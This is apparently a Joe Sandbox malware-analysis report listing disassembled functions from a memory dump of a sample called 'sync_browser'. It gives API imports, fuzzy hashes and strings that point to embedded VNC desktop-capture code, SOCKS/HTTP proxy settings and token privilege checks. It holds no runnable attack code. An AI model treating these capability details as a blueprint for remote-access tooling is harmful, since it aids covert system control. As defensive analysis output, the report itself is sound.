Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
Instruction ID: e54e86a55510e073d61ea65febb78ccc38b8967109f5f5537c14bed3d3d9caa2
Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
Instruction Fuzzy Hash: 1D713135A19A86D9E710EF64E8406E973A0FB08368F801336EA6D577E9DF3CE115C760

Function 00007FF740010430 Relevance: 36.2, APIs: 24, Instructions: 202COMMON

Download Yara Rule

APIs

GetRgnBox.GDI32 ref: 00007FF740010473
CreateRectRgn.GDI32 ref: 00007FF7400104BC
CombineRgn.GDI32 ref: 00007FF7400104D9
OffsetRgn.GDI32 ref: 00007FF7400104EE
GetRgnBox.GDI32 ref: 00007FF74001050D
GetRgnBox.GDI32 ref: 00007FF740010524
GetRgnBox.GDI32 ref: 00007FF740010532
DeleteObject.GDI32 ref: 00007FF7400106F1
free.LIBCMT ref: 00007FF7400106FB
DeleteObject.GDI32 ref: 00007FF740010704
free.LIBCMT ref: 00007FF74001070E
DeleteObject.GDI32 ref: 00007FF740010716
free.LIBCMT ref: 00007FF740010720

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: DeleteObjectfree$CombineCreateOffsetRect
String ID:
API String ID: 960235054-0
Opcode ID: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
Instruction ID: 437db2e74d81f96f5e0c7c006b66ccb406e6f1b9bf36767ca749197aa66a3e15
Opcode Fuzzy Hash: ac153f7d938eb301090265389bc7675e5ea949dc37f539b25424fdb8fde9d8de
Instruction Fuzzy Hash: F3911B36B08A42D6EB20FB66E4546BDB361FB45B88F808031DE5E57B69DE38F505C720

Function 00007FF74000B550 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000B030: _wgetenv.LIBCMT ref: 00007FF74000B05E
Part of subcall function 00007FF74000B030: _wgetenv.LIBCMT ref: 00007FF74000B08C
Part of subcall function 00007FF74000B030: _wgetenv.LIBCMT ref: 00007FF74000B0DC
Part of subcall function 00007FF74000B030: inet_ntoa.WS2_32 ref: 00007FF74000B1C8

inet_ntoa.WS2_32 ref: 00007FF74000B5B8
free.LIBCMT ref: 00007FF74000B5D4
_wgetenv.LIBCMT ref: 00007FF74000B682
free.LIBCMT ref: 00007FF74000B5CC

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

inet_ntoa.WS2_32 ref: 00007FF74000B59C

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

_wgetenv.LIBCMT ref: 00007FF74000B60D
_wgetenv.LIBCMT ref: 00007FF74000B665
_wgetenv.LIBCMT ref: 00007FF74000B6B0
_wgetenv.LIBCMT ref: 00007FF74000B701
_wgetenv.LIBCMT ref: 00007FF74000B738
_wgetenv.LIBCMT ref: 00007FF74000B766
free.LIBCMT ref: 00007FF74000B893

Strings

http://, xrefs: 00007FF74000B7BE
SOCKS5_SERVER, xrefs: 00007FF74000B65E, 00007FF74000B672
SOCKS_RESOLVE, xrefs: 00007FF74000B75F, 00007FF74000B773
SOCKS5_RESOLVE, xrefs: 00007FF74000B6FA, 00007FF74000B70E
SOCKS_SERVER, xrefs: 00007FF74000B6A9, 00007FF74000B6BD
SOCKS4_RESOLVE, xrefs: 00007FF74000B731, 00007FF74000B745
HTTP_PROXY, xrefs: 00007FF74000B606, 00007FF74000B61A
SOCKS4_SERVER, xrefs: 00007FF74000B67B, 00007FF74000B68F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
API String ID: 3609861302-2295524587
Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
Instruction ID: 080ffc943205fcdf725973426850840145e683ef4cdbb2f9aef797cfd37a4c7b
Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
Instruction Fuzzy Hash: 18A12F21A0DA82C5FE65BB25A8503B9A2A0BF55784FC84435DA0D577BEEE2CF901C360

Function 00007FF7400C844C Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 206COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400C849D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C84A8
_wsopen_s.LIBCMT ref: 00007FF7400C86B9

Strings

r, xrefs: 00007FF7400C8493
UTF-8, xrefs: 00007FF7400C8625
UTF-16LE, xrefs: 00007FF7400C8648
w, xrefs: 00007FF7400C8498
=, xrefs: 00007FF7400C8614
a, xrefs: 00007FF7400C848E
UNICODE, xrefs: 00007FF7400C866B
, xrefs: 00007FF7400C8620
, xrefs: 00007FF7400C85E4
, xrefs: 00007FF7400C8489
, xrefs: 00007FF7400C860F
, xrefs: 00007FF7400C8695
ccs, xrefs: 00007FF7400C85E9

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo_wsopen_s
String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
API String ID: 2053332431-1561892669
Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
Instruction ID: 9608cebc40cdeeba8892eecf95fc216c8dbca6a2c73becbaec0b51d370174b20
Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
Instruction Fuzzy Hash: B77187A2E0CA03C5FBBD7A25A9047399A806F55754E984434DE0E067EEDFBCF9408729

Function 00007FF7400144B0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 195windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF7400144FF
SetDlgItemTextA.USER32 ref: 00007FF74001459D
SendDlgItemMessageA.USER32 ref: 00007FF7400145E1
SendDlgItemMessageA.USER32 ref: 00007FF740014608
_snprintf.LIBCMT ref: 00007FF74001464F
SendDlgItemMessageA.USER32 ref: 00007FF74001466F
SendDlgItemMessageA.USER32 ref: 00007FF74001468B
SendDlgItemMessageA.USER32 ref: 00007FF7400146BB
SendDlgItemMessageA.USER32 ref: 00007FF7400146E0
_snprintf.LIBCMT ref: 00007FF740014731
SendDlgItemMessageA.USER32 ref: 00007FF740014751
GetDlgItem.USER32 ref: 00007FF74001477F
GetScrollInfo.USER32 ref: 00007FF740014791
SendDlgItemMessageA.USER32 ref: 00007FF7400147CA

Strings

<%s>: , xrefs: 00007FF740014640
MS Sans Serif, xrefs: 00007FF74001461D, 00007FF7400146F8

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Item$MessageSend$_snprintf$InfoScrollText
String ID: <%s>: $MS Sans Serif
API String ID: 1140286628-959951747
Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
Instruction ID: 2c5e48f8ea8a4f6b1fe1a4742ab6cec79e245cd76c15df89441704c4206ba773
Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
Instruction Fuzzy Hash: 88917F62A08A55C6F720EF65E8006A973A0FB98B88F904235DE4D17B78DF3CE595C360

Function 00007FF7400C23D8 Relevance: 27.2, APIs: 18, Instructions: 236COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF7400C241C
_errno.LIBCMT ref: 00007FF7400C2423
__doserrno.LIBCMT ref: 00007FF7400C2446
_errno.LIBCMT ref: 00007FF7400C244D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C2755

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
Instruction ID: 44fd7cb79945294c0c5d3572861556a9aac282c7a1f629a7197a826fa4ee76bd
Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
Instruction Fuzzy Hash: 7AB11832A0C652C6E768BF65A49113EF7A0FB84B50F904235E69943BA8DF7CF451DB20

Function 00007FF74006A5B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 117threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF74006A5E1
GetThreadDesktop.USER32 ref: 00007FF74006A5E9
OpenInputDesktop.USER32 ref: 00007FF74006A5FC
GetLastError.KERNEL32 ref: 00007FF74006A61A
GetUserObjectInformationA.USER32 ref: 00007FF74006A68D
CloseDesktop.USER32 ref: 00007FF74006A69A

Strings

vncservice.cpp : !GetUserObjectInformation(inputdesktop, xrefs: 00007FF74006A724
vncservice.cpp : OpenInputDesktop %i I, xrefs: 00007FF74006A620
vncservice.cpp : !GetUserObjectInformation(threaddesktop, xrefs: 00007FF74006A6B9
vncservice.cpp : failed to close input desktop, xrefs: 00007FF74006A6A4, 00007FF74006A70F, 00007FF74006A737
vncservice.cpp : threadname, inputname differ, xrefs: 00007FF74006A777
vncservice.cpp : OpenInputDesktop II, xrefs: 00007FF74006A652

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
API String ID: 55935355-432259686
Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction ID: 869a646d9ddfba198965b90bdae2c087dccbfce1c7a5b81060ddb663f42e3894
Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction Fuzzy Hash: 2B513D65B0CA83C1EB64BB61B8441B9A3A6BF89744FC44432D54E827B8EF3CF515DB20

Function 00007FF740033260 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 89threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF740033282
GetThreadDesktop.USER32 ref: 00007FF74003328A
GetUserObjectInformationA.USER32 ref: 00007FF7400332CF
ResetEvent.KERNEL32 ref: 00007FF740033333
CreateThread.KERNEL32 ref: 00007FF740033359
WaitForSingleObject.KERNEL32 ref: 00007FF740033372
TerminateThread.KERNEL32 ref: 00007FF7400333A3
CloseHandle.KERNEL32 ref: 00007FF7400333B0

Strings

vncdesktopsink.cpp : StartInitWindowthread no default desk, xrefs: 00007FF740033403
vncdesktopsink.cpp : StartInitWindowthread default desk, xrefs: 00007FF740033312
vncdesktopsink.cpp : StartInitWindowthread started, xrefs: 00007FF7400333CD
vncdesktopsink.cpp : ERROR: initwindowthread failed to start , xrefs: 00007FF740033389
Default, xrefs: 00007FF7400332E5
vncdesktopsink.cpp : StartInitWindowthread , xrefs: 00007FF740033290
vncdesktopsink.cpp : StartInitWindowthread reactivate, xrefs: 00007FF7400333E2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
API String ID: 3943905059-2958163836
Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
Instruction ID: 17348b489c85ccd11cae08e32787e456416b0270a47b10940939d449ab2f7029
Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
Instruction Fuzzy Hash: 1C410861A1CA86C2E715BB60E8443EAA369FB84744FC44132DA4D577BDDE3CF14AC760

Function 00007FF740070160 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00007FF740070180
GlobalFree.KERNEL32 ref: 00007FF740070196
GlobalAlloc.KERNEL32 ref: 00007FF74007023D
GlobalLock.KERNEL32 ref: 00007FF740070256
malloc.LIBCMT ref: 00007FF740070325

Strings

Unable to allocate memory in zip dll, xrefs: 00007FF74007033B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$Lock$AllocFreemalloc
String ID: Unable to allocate memory in zip dll
API String ID: 105282483-1808592719
Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
Instruction ID: b452ac3ce150bd8ace98f5f0d12f6ee0cae7c9696c4967ce897f6b92ffd7d223
Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
Instruction Fuzzy Hash: F2714762A0DB42C6EB05BF64E4542B8A3A4FF48B84F844235DE5E473A9DF3CE542C720

Function 00007FF74002F420 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 157windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 00007FF74002F467
ReleaseDC.USER32 ref: 00007FF74002F488
DeleteDC.GDI32 ref: 00007FF74002F4AE
DeleteDC.GDI32 ref: 00007FF74002F4C7
DeleteObject.GDI32 ref: 00007FF74002F4F9
DeleteObject.GDI32 ref: 00007FF74002F532
DeleteObject.GDI32 ref: 00007FF74002F54B
CloseDesktop.USER32 ref: 00007FF74002F599

Strings

vncdesktop.cpp : failed to DeleteObject, xrefs: 00007FF74002F503
vncdesktop.cpp : failed to close desktop, xrefs: 00007FF74002F5A3
vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF74002F492
vncdesktop.cpp : failed to DeleteDC hmemdc, xrefs: 00007FF74002F4D1
vncdesktopsink.cpp : ShutdownInitWindowthread , xrefs: 00007FF74002F433
vncdesktop.cpp : delete ((RGBPixelList) , xrefs: 00007FF74002F646

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Delete$Object$CloseDesktopMessagePostRelease
String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
API String ID: 4267955742-668190334
Opcode ID: b1f7d07e1edd3f10dab7f78dec4ede179cd97e7d089ffa8d205f7fdce4919795
Instruction ID: b1117c935d924993f1255af559cafb59da7885beeda5abe110511b45c2a43e7d
Opcode Fuzzy Hash: b1f7d07e1edd3f10dab7f78dec4ede179cd97e7d089ffa8d205f7fdce4919795
Instruction Fuzzy Hash: B2713736A0CA86C4EB24BF61E9446BAA364FF44788F844436DA0D47768CF7CF645E320

Function 00007FF740010E00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 153memorythreadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF740010E34
GetCurrentProcess.KERNEL32 ref: 00007FF740010E4C
FindWindowA.USER32 ref: 00007FF740010E62
GetWindowThreadProcessId.USER32 ref: 00007FF740010E78
OpenProcess.KERNEL32 ref: 00007FF740010E8E
OpenProcessToken.ADVAPI32 ref: 00007FF740010EA8
GetTokenInformation.ADVAPI32 ref: 00007FF740010EF6
GetLastError.KERNEL32 ref: 00007FF740010F19
malloc.LIBCMT ref: 00007FF740010F67

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

GetTokenInformation.ADVAPI32 ref: 00007FF740010FA0
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF740010FE7
EqualSid.ADVAPI32 ref: 00007FF740011008
FreeSid.ADVAPI32 ref: 00007FF740011028

Strings

Shell_TrayWnd, xrefs: 00007FF740010E59

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
